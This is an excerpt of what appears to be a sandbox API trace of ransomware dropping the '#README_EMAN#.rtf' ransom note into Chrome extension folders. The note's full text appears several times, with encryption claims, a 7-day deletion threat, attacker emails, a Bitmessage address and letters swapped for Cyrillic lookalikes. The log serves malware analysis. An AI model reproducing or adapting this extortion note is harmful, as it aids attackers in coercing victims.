urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.526] WriteFile (in: hFile=0x2c8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.527] CloseHandle (hObject=0x2c8) returned 1 [0272.527] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\#readme_eman#.rtf")) returned 0xffffffff [0272.527] GetLastError () returned 0x2 [0272.527] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0272.528] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.528] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m 